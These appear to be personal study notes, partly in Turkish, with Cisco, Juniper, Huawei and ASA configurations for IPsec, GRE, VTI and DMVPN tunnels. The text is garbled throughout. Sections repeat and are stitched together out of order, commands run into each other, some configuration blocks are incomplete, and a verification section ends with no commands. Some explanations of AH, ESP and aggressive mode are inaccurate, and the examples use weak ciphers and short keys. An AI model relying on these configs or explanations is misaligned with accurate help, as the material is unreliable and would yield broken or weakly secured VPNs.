=> Remote Access
İPsec vpn has two levels. Step one is an ike , two is an ipsec.
Ike Phase 1 uses Haggle metod. Aggressive mode => 3 messages
Main mode => 6 messages
Hashing = Md5,Sha
Authentication = psk,rsa-sig
Group = dh1, dh2, dh5 , dh14
Life time = second
Encryption = aes,des,3des
Ike Phase 2 = Ipsec purpose is save the data.
Quick mode => 3 messages
Tunnel mode , which is the default mode on Cisco routers
1- AH Transport = it hash entire of packet.
2-AH Tunnel = it add new ip header and hash entire of packet.
3- ESP Transport = It encrypt data then Hash entire of packet.
4- Esp Tunnel = It encrypt data then Hash entire of packet and add new ip header .
Crypto Map; we use an interface and it occurs ;
PHASE 1 MAIN MODE
PHASE 1 PSK OR SIGNATURE
PHASE 2 TUNNEL OR TRANSPORT
Ipsec occurs
1AH(Authentication Header)
2 ESP(Encapsulating Security Payload)
Simulation Example 1;
direk diş ipler ile eğer tunnel ipsi verilecek ise saglıklısı budur . altaki ipsec bolumune bakalım.
R1;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2 (ıt uses psk for creating password, and match source address with psk(pre-share-key))
hash sha
lifetime 86400
exit
crypto isakmp key 6 SIFRE address 10.0.0.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel
!
access-list 100 permit ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
!
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.2
set transform-set ALI
match address 100
interface Loopback0
ip address 100.0.1.1 255.255.255.0
!
interface FastEthernet0/0
ip address 10.0.0.1 255.255.255.0
crypto map ALImap
ip route 100.0.2.0 255.255.255.0 10.0.0.2
R2;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
exit
crypto isakmp key 6 SIFRE address 10.0.0.1
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel
!
access-list 100 permit ip 100.0.2.0 0.0.0.255 100.0.1.0 0.0.0.255
!
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.1
set transform-set ALI
match address 100
interface Loopback0
ip address 100.0.2.1 255.255.255.0
!
interface FastEthernet0/0
ip address 10.0.0.2 255.255.255.0
crypto map ALImap
ip route 100.0.1.0 255.255.255.0 10.0.0.1
Aggressive Mode
İf you use aggressive mode , you should use transport mode and you dont need extra header at transport mode.
You need to add this configuration .
crypto isakmp profile ALIprofile
keyring default
self-identity address
match identity address 10.0.0.2
initiate mode aggressive
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
crypto map ALImap 1 ipsec-isakmp
set isakmp-profile ALIprofile
access-list 100 permit ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
access-list 100 permit ip 10.0.0.0 0.0.0.255 10.0.0.0 0.0.0.255Nat Exemption
100.0.1.1 is inside ip address for R1 and we have nat configuration to reach to the internet.We use nat the ip address at inside interface before ipsec encryption so we should exclude local ip address for ipsec vpn.
R1;
ip access-list extended natolacaklar
deny ip host 100.0.1.1 host 100.0.2.1
interface lo 0
ip nat inside
interface fa0/0
ip nat outside
ip nat pool natpool 10.0.0.10 10.0.0.20 prefix-length 24
ip nat inside source list natolacaklar pool natpool
everthing is same foregoing configuration for R1 and R2.
RSA- Rivest-Shamir-Adleman Signature
R2,R3;
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.3 (10.0.0.2 at R2)
set transform-set ALI
set identity R3 (R2 at R3)
match address 100
interface fa0/0
crypto map ALImap
You can check with these commands;
Crypto map is very old technology.
GRE Generic Routing Encapsulation
GRE bir kapsülleme protokolü olarak çalışır. GRE, üzerine IP başlığı eklenip IP paketi haline gelmiş veriyi kapsüller ve üzerine yeni bir IP başlığı ekler. Yeni eklenen IP başlığında ise paketin gideceği hedefin IP adresi bulunmaz. Onun yerine GRE tünelinin uç IP adresleri bulunur. Üçüncü katmanda çalışan cihazlar bu paketi yönlendirirken kapsülün dışındaki IP adreslerine yani GRE tünelinin uç IP adreslerine bakarak yönlendirme yapar. Dolayısıyla kapsülün içindeki IP adresinden haberdar olmazlar. Paket, tünelin sonuna geldiğinde GRE kapsülü çıkarılır ve paket kendi kaynak ve hedef IP adreslerine göre yönlendirmeye devam eder.
GRE protocol number is 47
EIGRP protocol number is 88
ICMP protocol number is 1
If you want to use dynamic protocol(Ospf,Rip) These devices must be directly connected because of this reason(ttl value is 1 of packets) . We should use tunnel ıp address.
you can not encrypt of packet at Gre.
R2:
interface Tunnel0
ip address 3.3.3.1 255.255.255.252
tunnel source 192.168.1.2
tunnel destination 192.168.2.2
!
interface Loopback0
ip address 1.1.1.1 255.255.255.255
!
interface FastEthernet0/0
ip address 192.168.1.2 255.255.255.0
set interfaces gr-0/0/0 unit 0 tunnel source 78.106.136.123
set interfaces gr-0/0/0 unit 0 tunnel source 94.155.104.78
[R1]interface Tunnel 0/0/1
[R1-Tunnel0/0/1]ip address 100.1.1.1 24
[R1-Tunnel0/0/1]tunnel-protocol gre
[R1-Tunnel0/0/1]source 10.0.12.1
[R1-Tunnel0/0/1]destination 10.0.23.3
[R3]interface Tunnel 0/0/1
[R3-Tunnel0/0/1]ip address 100.1.1.2 24
[R3-Tunnel0/0/1]tunnel-protocol gre
[R3-Tunnel0/0/1]source 10.0.23.3
[R3-Tunnel0/0/1]destination 10.0.12.1
[R1]ospf 1
[R1-ospf-1]area 0
[R1-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R1]ospf 2 router-id 10.0.1.1
[R1-ospf-2]area 0
[R1-ospf-2-area-0.0.0.0]network 10.0.12.0 0.0.0.255
[R3]ospf 1
[R3-ospf-1]area 0
[R3-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R3]ospf 2 router-id 10.0.3.3
[R3-ospf-2]area 0
[R3-ospf-2-area-0.0.0.0]network 10.0.23.0 0.0.0.255
VTI(Virtual Tunnel İnterface)
VTI supports Dynamic routing protocols.
Gre uses 4 bytes Gre header . VTI doesnt use extra header.
Cisco;
interface GigabitEthernet 0/0/0
ip address 213.168.222.2 255.255.255.0(it is your outside ip)
no shut
exit
interface GigabitEthernet 1/0/1
ip address 192.168.224.1 255.255.255.0(inside ip)
no shut
crypto isakmp policy 1
encryption 3des
hash sha1
authentication pre-share
group 2
exit
crypto isakmp key Juniperpassword address 213.168.0.1 (Juniperpassword you type what you want and Juniper outside ip address)
crypto isakmp profile Juniper
keyring default
match identity address 4.4.4.1(it is necessary between cisco to juniper)
initiate mode agressive
crypto ipsec transform-set vpnjunos esp-3des esp-sha-hmac
exit
,
crypto ipsec profile VTI
set transform-set vpnjunos
exit
int tunnel 1
ip address 4.4.4.2 255.255.255.0
ip mtu 1384 (also if you dont give mtu value you can experience a problem,it should be same with juniper)
tunnel source 213.168.222.2
tunnel destination 213.168.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile VTI
exit
ip route 10.3.3.0 255.255.255.0 4.4.4.1 (where you want to go , you must go to Juniper:)
Juniper;
set interfaces ge-0/0/0 unit 0 description SRX1
set interfaces ge-0/0/0 unit 0 family inet address 213.168.0.1/24
set interfaces ge-0/0/1 unit 0 family inet address 10.3.3.1/24
set interfaces st0 unit 0 description VPN-AKM
set interfaces st0 unit 0 family inet mtu 1384
set interfaces st0 unit 0 family inet address 4.4.4.1/24
set security ike proposal VPNtoVPN authentication-method pre-shared-keys
set security ike proposal VPNtoVPN dh-group group2
set security ike proposal VPNtoVPN authentication-algorithm sha1
set security ike proposal VPNtoVPN encryption-algorithm 3des-cbc
set security ike policy VPN mode aggressive
set security ike policy VPN proposals VPNtoVPN
set security ike policy VPN pre-shared-key ascii-text Juniperpassword
set security ike gateway VPNAKM ike-policy VPN
set security ike gateway VPNAKM address 213.168.222.2 (your neighbour outside ip adress)
set security ike gateway VPNAKM local-identity inet 4.4.4.1
set security ike gateway VPNAKM external-interface ge-0/0/0.0
set security ipsec proposal VPN protocol esp
set security ipsec proposal VPN authentication-algorithm hmac-sha1-96
set security ipsec proposal VPN encryption-algorithm 3des-cbc
set security ipsec policy VPN proposals VPN
set security ipsec vpn VPNVPN bind-interface st0.0
set security ipsec vpn VPNVPN ike gateway VPNAKM
set security ipsec vpn VPNVPN ike ipsec-policy VPN
set security ipsec vpn VPNVPN establish-tunnels immediately
set security zones security-zone SRX1 host-inbound-traffic system-services all
set security zones security-zone SRX1 host-inbound-traffic protocols all
set security zones security-zone SRX1 interfaces ge-0/0/0
set security zones security-zone SRX1 interfaces ge-0/0/1
set security zones security-zone SRX1 interfaces st0.0
set security policies from-zone SRX1 to-zone SRX1 policy INT match source-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match destination-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match application any
set security policies from-zone SRX1 to-zone SRX1 policy INT then permit
set routing-options static route 192.168.224.0/24 next-hop 4.4.4.2
Site to Site Vpn at Juniper Devices
R1;
set security ike policy ido-gkm mode main
set security ike policy ido-gkm proposal-set standard
set security ike policy ido-gkm pre-shared-key ascii-text Juniper
set security ike gateway ido-gkm ike-policy ido-gkm
set security ike gateway ido-gkm address 85.105.212.100
set security ike gateway ido-gkm external-interface pp0.0
set security ipsec policy ido-gkm proposal-set standard
set security ipsec vpn ido-gkm bind-interface st0.14
set security ipsec vpn ido-gkm vpn-monitor optimized
set security ipsec vpn ido-gkm ike gateway ido-gkm
set security ipsec vpn ido-gkm ike ipsec-policy ido-gkm
set security ipsec vpn ido-gkm establish-tunnels immediately
R2;
set security ike policy sirketi2topcular mode main
set security ike policy sirketi2topcular proposal-set standard
set security ike policy sirketi2topcular pre-shared-key ascii-text Juniper
set security ike gateway sirketi2topcular ike-policy sirketi2topcular
set security ike gateway sirketi2topcular address 87.109.68.183
set security ike gateway sirketi2topcular external-interface pp0.0
R1;
ntp master
ntp server 10.0.0.1
R2,R3;
ntp server 10.0.0.1
R1;
ip http server
crypto pki server ALIca
hash sha
grant auto
no shutdown (You should give a password like a Aliihsan123)
R2,R3
ip domain-name ali.local
crypto key generate rsa general-keys modulus 1024
crypto pki trustpoint ALIca
enrollment url http://10.0.0.1:80
subject-name CN=R3 (you should write CN=R2 at R3)
revocation-check none
rsakeypair R2.ali.local (write R3.ali.local at R3)
crypto pki authentication ALIca (yes)
crypto pki enroll ALIca (n,n,y)
that is it go on ipsec vpn configuration ;
crypto isakmp policy 1
encr 3des
authentication rsa-sig
group 2
hash sha
lifetime 86400
exit
crypto identity R3 (write R2 at R3)
fqdn R3.ali.local (write R2.ali.local at R3)
access-list 100 permit ip host 100.0.2.1 host 100.0.3.1 (you edit at R3 access-list 100 permit ip host 100.0.3.1 host 100.0.2.1)
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
set peer 10.0.0.3 (10.0.0.2 at R2)
set transform-set ALI
set identity R3 (R2 at R3)
match address 100
interface fa0/0
crypto map ALImap
You can check with these commands;
Crypto map is very old technology.
GRE Generic Routing Encapsulation
GRE bir kapsülleme protokolü olarak çalışır. GRE, üzerine IP başlığı eklenip IP paketi haline gelmiş veriyi kapsüller ve üzerine yeni bir IP başlığı ekler. Yeni eklenen IP başlığında ise paketin gideceği hedefin IP adresi bulunmaz. Onun yerine GRE tünelinin uç IP adresleri bulunur. Üçüncü katmanda çalışan cihazlar bu paketi yönlendirirken kapsülün dışındaki IP adreslerine yani GRE tünelinin uç IP adreslerine bakarak yönlendirme yapar. Dolayısıyla kapsülün içindeki IP adresinden haberdar olmazlar. Paket, tünelin sonuna geldiğinde GRE kapsülü çıkarılır ve paket kendi kaynak ve hedef IP adreslerine göre yönlendirmeye devam eder.
EIGRP protocol number is 88
ICMP protocol number is 1
If you want to use dynamic protocol(Ospf,Rip) These devices must be directly connected because of this reason(ttl value is 1 of packets) . We should use tunnel ıp address.
you can not encrypt of packet at Gre.
R2:
interface Tunnel0
ip address 3.3.3.1 255.255.255.252
tunnel source 192.168.1.2
tunnel destination 192.168.2.2
!
interface Loopback0
ip address 1.1.1.1 255.255.255.255
!
interface FastEthernet0/0
ip address 192.168.1.2 255.255.255.0
!
router eigrp 100
network 1.1.1.1
network 3.3.3.1
!
ip route 2.2.2.2 255.255.255.255 3.3.3.2
ip route 192.168.2.2 255.255.255.255 192.168.1.1
ip route 192.168.2.2 255.255.255.255 192.168.1.1
R3;
interface Tunnel0
ip address 3.3.3.2 255.255.255.252
tunnel source 192.168.2.2
tunnel destination 192.168.1.2
!
interface Loopback0
ip address 2.2.2.2 255.255.255.255
!
interface FastEthernet1/0
ip address 192.168.2.2 255.255.255.0
!
router eigrp 100
network 2.2.2.2
network 3.3.3.2
!
ip route 1.1.1.1 255.255.255.255 3.3.3.1
ip route 192.168.1.2 255.255.255.255 192.168.2.1
If you want to encrypt the data ;
IPSEC
tunnel ipsi ile
R2;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
lifetime 86400
crypto isakmp key 6 SIFRE address 192.168.2.2
ip route 192.168.1.2 255.255.255.255 192.168.2.1
If you want to encrypt the data ;
IPSEC
tunnel ipsi ile
R2;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
lifetime 86400
crypto isakmp key 6 SIFRE address 192.168.2.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel
!
crypto ipsec profile ALIipsecprofile
set transform-set ALI
mode tunnel
!
crypto ipsec profile ALIipsecprofile
set transform-set ALI
interface tunnel 0
tunnel protection ipsec profile ALIipsecprofile
R3;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
lifetime 86400
crypto isakmp key 6 SIFRE address 192.168.1.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIipsecprofile
set transform-set ALI
interface tunnel 0
tunnel protection ipsec profile ALIipsecprofile
JUNIPER Gre Configuration
R1;
set interfaces gr-0/0/0 unit 0 family inet address 6.6.6.1/30set interfaces gr-0/0/0 unit 0 tunnel source 78.106.136.123
set interfaces gr-0/0/0 unit 0 tunnel destination 94.155.104.78
set protocols ospf area 0.0.0.34 interface gr-0/0/0 metric 10
set security zones security-zone WAN host-inbound-traffic system-services all
set security zones security-zone WAN host-inbound-traffic protocols all
set security zones security-zone WAN interfaces gr-0/0/0
R2
set interfaces gr-0/0/0 unit 0 family inet address 6.6.6.2/30set interfaces gr-0/0/0 unit 0 tunnel source 94.155.104.78
set interfaces gr-0/0/0 unit 0 tunnel destination 78.106.136.123
set protocols ospf area 0.0.0.34 interface gr-0/0/0 metric 10
set security zones security-zone WAN host-inbound-traffic system-services all
set security zones security-zone WAN host-inbound-traffic protocols all
set security zones security-zone WAN interfaces gr-0/0/0
Huawei GRE
[R1-Tunnel0/0/1]ip address 100.1.1.1 24
[R1-Tunnel0/0/1]tunnel-protocol gre
[R1-Tunnel0/0/1]source 10.0.12.1
[R1-Tunnel0/0/1]destination 10.0.23.3
[R3]interface Tunnel 0/0/1
[R3-Tunnel0/0/1]ip address 100.1.1.2 24
[R3-Tunnel0/0/1]tunnel-protocol gre
[R3-Tunnel0/0/1]source 10.0.23.3
[R3-Tunnel0/0/1]destination 10.0.12.1
[R1-ospf-1]area 0
[R1-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R1]ospf 2 router-id 10.0.1.1
[R1-ospf-2]area 0
[R1-ospf-2-area-0.0.0.0]network 10.0.12.0 0.0.0.255
[R3]ospf 1
[R3-ospf-1]area 0
[R3-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R3]ospf 2 router-id 10.0.3.3
[R3-ospf-2]area 0
[R3-ospf-2-area-0.0.0.0]network 10.0.23.0 0.0.0.255
VTI supports Dynamic routing protocols.
Gre uses 4 bytes Gre header . VTI doesnt use extra header.
R2;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
crypto isakmp key 0 SIFRE address 10.0.0.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
crypto ipsec profile TEST
set transform-set ALI
interface Tunnel0
ip address 100.0.1.1 255.255.255.252
tunnel source 10.0.0.1
tunnel destination 10.0.0.2
tunnel mode ipsec ipv4
tunnel protection ipsec profile TEST
!
interface FastEthernet0/0
ip address 10.0.0.1 255.255.255.0
no shut
ip route 192.168.1.0 255.255.255.0 100.0.1.2
R3;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
crypto isakmp key 0 SIFRE address 10.0.0.1
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
crypto ipsec profile TEST
set transform-set ALI
interface Tunnel1
ip address 100.0.1.2 255.255.255.252
tunnel source 10.0.0.2
tunnel destination 10.0.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile TEST
!
interface FastEthernet0/0
ip address 10.0.0.2 255.255.255.0
no shut
interface FastEthernet2/0
ip address 192.168.1.1 255.255.255.0
no shut
R1;
interface FastEthernet0/0
ip address 192.168.1.2 255.255.255.0
no shut
ip route 0.0.0.0 0.0.0.0 192.168.1.1
Juniper to Cisco VTI Tunnel Configuration
Cisco;
interface GigabitEthernet 0/0/0
ip address 213.168.222.2 255.255.255.0(it is your outside ip)
no shut
exit
interface GigabitEthernet 1/0/1
ip address 192.168.224.1 255.255.255.0(inside ip)
no shut
crypto isakmp policy 1
encryption 3des
hash sha1
authentication pre-share
group 2
exit
crypto isakmp key Juniperpassword address 213.168.0.1 (Juniperpassword you type what you want and Juniper outside ip address)
crypto isakmp profile Juniper
keyring default
match identity address 4.4.4.1(it is necessary between cisco to juniper)
initiate mode agressive
crypto ipsec transform-set vpnjunos esp-3des esp-sha-hmac
exit
,
crypto ipsec profile VTI
set transform-set vpnjunos
exit
int tunnel 1
ip address 4.4.4.2 255.255.255.0
ip mtu 1384 (also if you dont give mtu value you can experience a problem,it should be same with juniper)
tunnel source 213.168.222.2
tunnel destination 213.168.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile VTI
exit
ip route 10.3.3.0 255.255.255.0 4.4.4.1 (where you want to go , you must go to Juniper:)
Juniper;
set interfaces ge-0/0/0 unit 0 description SRX1
set interfaces ge-0/0/0 unit 0 family inet address 213.168.0.1/24
set interfaces ge-0/0/1 unit 0 family inet address 10.3.3.1/24
set interfaces st0 unit 0 description VPN-AKM
set interfaces st0 unit 0 family inet mtu 1384
set interfaces st0 unit 0 family inet address 4.4.4.1/24
set security ike proposal VPNtoVPN authentication-method pre-shared-keys
set security ike proposal VPNtoVPN dh-group group2
set security ike proposal VPNtoVPN authentication-algorithm sha1
set security ike proposal VPNtoVPN encryption-algorithm 3des-cbc
set security ike policy VPN mode aggressive
set security ike policy VPN proposals VPNtoVPN
set security ike policy VPN pre-shared-key ascii-text Juniperpassword
set security ike gateway VPNAKM ike-policy VPN
set security ike gateway VPNAKM address 213.168.222.2 (your neighbour outside ip adress)
set security ike gateway VPNAKM local-identity inet 4.4.4.1
set security ike gateway VPNAKM external-interface ge-0/0/0.0
set security ipsec proposal VPN protocol esp
set security ipsec proposal VPN authentication-algorithm hmac-sha1-96
set security ipsec proposal VPN encryption-algorithm 3des-cbc
set security ipsec policy VPN proposals VPN
set security ipsec vpn VPNVPN bind-interface st0.0
set security ipsec vpn VPNVPN ike gateway VPNAKM
set security ipsec vpn VPNVPN ike ipsec-policy VPN
set security ipsec vpn VPNVPN establish-tunnels immediately
set security zones security-zone SRX1 host-inbound-traffic system-services all
set security zones security-zone SRX1 host-inbound-traffic protocols all
set security zones security-zone SRX1 interfaces ge-0/0/0
set security zones security-zone SRX1 interfaces ge-0/0/1
set security zones security-zone SRX1 interfaces st0.0
set security policies from-zone SRX1 to-zone SRX1 policy INT match source-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match destination-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match application any
set security policies from-zone SRX1 to-zone SRX1 policy INT then permit
set routing-options static route 192.168.224.0/24 next-hop 4.4.4.2
Site to Site Vpn at Juniper Devices
R1;
set security ike policy ido-gkm mode main
set security ike policy ido-gkm proposal-set standard
set security ike policy ido-gkm pre-shared-key ascii-text Juniper
set security ike gateway ido-gkm ike-policy ido-gkm
set security ike gateway ido-gkm address 85.105.212.100
set security ike gateway ido-gkm external-interface pp0.0
set security ipsec policy ido-gkm proposal-set standard
set security ipsec vpn ido-gkm bind-interface st0.14
set security ipsec vpn ido-gkm vpn-monitor optimized
set security ipsec vpn ido-gkm ike gateway ido-gkm
set security ipsec vpn ido-gkm ike ipsec-policy ido-gkm
set security ipsec vpn ido-gkm establish-tunnels immediately
set interfaces st0 unit 0 family inet mtu 1384
set interfaces st0 unit 0 family inet address 5.5.5.1/30
R2;
set security ike policy sirketi2topcular mode main
set security ike policy sirketi2topcular proposal-set standard
set security ike policy sirketi2topcular pre-shared-key ascii-text Juniper
set security ike gateway sirketi2topcular ike-policy sirketi2topcular
set security ike gateway sirketi2topcular address 87.109.68.183
set security ike gateway sirketi2topcular external-interface pp0.0
set security ipsec policy sirketi2topcular proposal-set standard
set security ipsec vpn sirketi2topcular bind-interface st0.1
set security ipsec vpn sirketi2topcular vpn-monitor optimized
set security ipsec vpn sirketi2topcular ike gateway sirketi2topcular
set security ipsec vpn sirketi2topcular ike ipsec-policy sirketi2topcular
set security ipsec vpn sirketi2topcular establish-tunnels immediately
set interfaces st0 unit 1 family inet mtu 1384
set interfaces st0 unit 1 family inet address 5.5.5.2/30
Hub and Spoke Dynamic Vti
HUB;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
crypto keyring ALIkeyring
pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SIFRE
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
set transform-set ALI
!
crypto isakmp profile ALIprofile
keyring ALIkeyring
match identity address 0.0.0.0
virtual-template 1
!
interface Loopback0
ip address 100.0.1.1 255.255.255.0
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
crypto keyring ALIkeyring
pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SIFRE
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIprofileset transform-set ALI
!
crypto isakmp profile ALIprofile
keyring ALIkeyring
match identity address 0.0.0.0
virtual-template 1
!
interface Loopback0
ip address 100.0.1.1 255.255.255.0
!
interface Virtual-Template1 type tunnel
ip unnumbered Loopback0
tunnel mode ipsec ipv4
tunnel protection ipsec profile ALIprofile
!
router eigrp 1
network 10.0.0.0
network 100.0.0.0
no auto-summary
SPOKE1(SPOKE2 has similar configuration , you can edit to your ip address)
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
crypto isakmp key SIFRE address 10.0.0.1
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIprofile
set transform-set ALI
!
interface Loopback0
ip address 100.0.2.1 255.255.255.0
!
interface Tunnel0
ip unnumbered Loopback0
tunnel source 10.0.0.2
tunnel destination 10.0.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile ALIprofile
!
router eigrp 1
network 10.0.0.0
network 100.0.0.0
no auto-summary
IPSEC DMVPN;
HUB;interface Loopback0
ip address 10.0.0.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.1 255.255.255.0
no shut
!
interface Tunnel0!
ip address 192.168.1.1 255.255.255.0
ip mtu 1400
tunnel source 1.1.1.1
tunnel mode gre multipoint
ip nhrp network-id 1
no ip split-horizon eigrp 1
ip nhrp authentication 123 (Password)
ip nhrp map multicast dynamic
ip nhrp holdtime 600
ip nhrp redirect (if you find any shortway , you can change it)
!
router eigrp 1network 10.0.0.1
network 192.168.0.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha1
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
mode transport
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
no ip split-horizon eigrp 1
no ip split-horizon eigrp 1
interface Loopback0
ip address 10.0.1.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.2 255.255.255.0
no shut
!
interface Tunnel0ip address 192.168.1.2 255.255.255.0
ip mtu 1400
ip nhrp authentication 123
tunnel source 1.1.1.2
tunnel mode gre multipoint
ip nhrp map 192.168.1.1 1.1.1.1 (we know public address so we convert tunnel address to public ip)
ip nhrp map multicast 1.1.1.1 (send multicast message to this address)
ip nhrp network-id 1
ip nhrp nhs 192.168.1.1 (this is the server tunnel ip address)
ip nhrp holdtime 600
ip nhrp registration timeout 100 (we sent tunnel and public address to server per 100 seconds)
ip nhrp shortcut (if you find any shortway , you can use it)
router eigrp 1
network 10.0.1.0
network 192.168.1.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha1
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
mode transport
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
interface Loopback0
ip address 10.0.2.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.3 255.255.255.0
no shut
!
interface Tunnel0
ip address 192.168.1.3 255.255.255.0
ip mtu 1400
ip nhrp authentication 123
tunnel mode gre multipoint
ip nhrp map 192.168.1.1 1.1.1.1
ip nhrp map multicast 1.1.1.1
ip nhrp network-id 1
ip nhrp nhs 192.168.1.1
ip nhrp holdtime 600
ip nhrp registration timeout 100
tunnel source 1.1.1.3
ip nhrp shortcut (if you find any shortway , you can use it)
network 10.0.2.0
network 192.168.1.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha1
authentication pre-share
group 2
exit
encryption 3des
hash sha1
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
mode transport
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
ASA
Cisco ASA Site-to-Site IKEv2 IPSEC VPN
We will use the following topology for this example:
ASA1 and ASA2 are able to reach each other through their “OUTSIDE” Ethernet 0/1 interfaces. Their Ethernet 0/0 interfaces are the “INSIDE” where we have R1 and R2. The goal is to configure IKEv2 IPSEC site-to-site VPN between ASA1 and ASA2 so that R1 and R2 are able to reach each other.
Configuration
First we will configure the IKEv2 policy which is similar to phase 1 of IKEv1.IKEv2 Policy Configuration
Here’s what it looks like for both ASA firewalls:ASA1 & ASA2#
(config)# crypto ikev2 policy 10
ASA1(config-ikev2-policy)# encryption aes
ASA1(config-ikev2-policy)# group 2
ASA1(config-ikev2-policy)# prf sha
ASA1(config-ikev2-policy)# lifetime seconds 86400IKEv2 IPSEC Proposal
This section is similar to phase 2 of IKEv1 where we have to configure a transform set. For IKEv2 we call this the IPSEC proposal which is configured like this:ASA1 & ASA2#
(config)# crypto ipsec ikev2 ipsec-proposal MY_PROPOSAL
(config-ipsec-proposal)# protocol esp encryption aes
(config-ipsec-proposal)# protocol esp integrity sha-1ASA1(config)# access-list LAN1_LAN2 extended permit ip host 192.168.1.1 host 192.168.2.2ASA2(config)# access-list LAN2_LAN1 extended permit ip host 192.168.2.2 host 192.168.1.1ASA1(config)# crypto map MY_CRYPTO_MAP 1 match address LAN1_LAN2
ASA1(config)# crypto map MY_CRYPTO_MAP 1 set peer 10.10.10.2
ASA1(config)# crypto map MY_CRYPTO_MAP 1 set ikev2 ipsec-proposal MY_PROPOSAL
ASA1(config)# crypto map MY_CRYPTO_MAP interface OUTSIDEASA2(config)# crypto map MY_CRYPTO_MAP 1 match address LAN2_LAN1
ASA2(config)# crypto map MY_CRYPTO_MAP 1 set peer 10.10.10.1
ASA2(config)# crypto map MY_CRYPTO_MAP 1 set ikev2 ipsec-proposal MY_PROPOSAL
ASA2(config)# crypto map MY_CRYPTO_MAP interface OUTSIDEThe next step is to configure a tunnel group. This is where we define authentication and the pre-shared-key:
ASA1(config)# tunnel-group 10.10.10.2 type ipsec-l2l
ASA1(config)# tunnel-group 10.10.10.2 ipsec-attributes
ASA1(config-tunnel-ipsec)# ikev2 local-authentication pre-shared-key CISCO123
ASA1(config-tunnel-ipsec)# ikev2 remote-authentication pre-shared-key CISCO456ASA2(config)# tunnel-group 10.10.10.1 type ipsec-l2l
ASA2(config)# tunnel-group 10.10.10.1 ipsec-attributes
ASA2(config-tunnel-ipsec)# ikev2 local-authentication pre-shared-key CISCO456
ASA2(config-tunnel-ipsec)# ikev2 remote-authentication pre-shared-key CISCO123ASA1(config)# crypto ikev2 enable OUTSIDEASA2(config)# crypto ikev2 enable OUTSIDEASA1(config)# route OUTSIDE 192.168.2.0 255.255.255.0 10.10.10.2ASA2(config)# route OUTSIDE 192.168.1.0 255.255.255.0 10.10.10.1Verification
Generate some traffic between R1 and R2 so that the ASA firewalls have to establish the IPSEC tunnel. First we’ll check if we have a IKEv2 security association:ASA1# show crypto isakmp sa
There are no IKEv1 SAs
IKEv2 SAs:
Session-id:1, Status:UP-ACTIVE, IKE count:1, CHILD count:1
Tunnel-id Local Remote Status Role
7658533 10.10.10.1/500 10.10.10.2/500 READY INITIATOR
Encr: AES-CBC, keysize: 128, Hash: SHA96, DH Grp:2, Auth sign: PSK, Auth verify: PSK
Life/Active Time: 86400/22 sec
Child sa: local selector 192.168.1.1/0 - 192.168.1.1/65535
remote selector 192.168.2.2/0 - 192.168.2.2/65535
ESP spi in/out: 0x99589369/0xfcd7e620ASA1# show crypto ipsec sa
interface: OUTSIDE
Crypto map tag: MY_CRYPTO_MAP, seq num: 1, local addr: 10.10.10.1
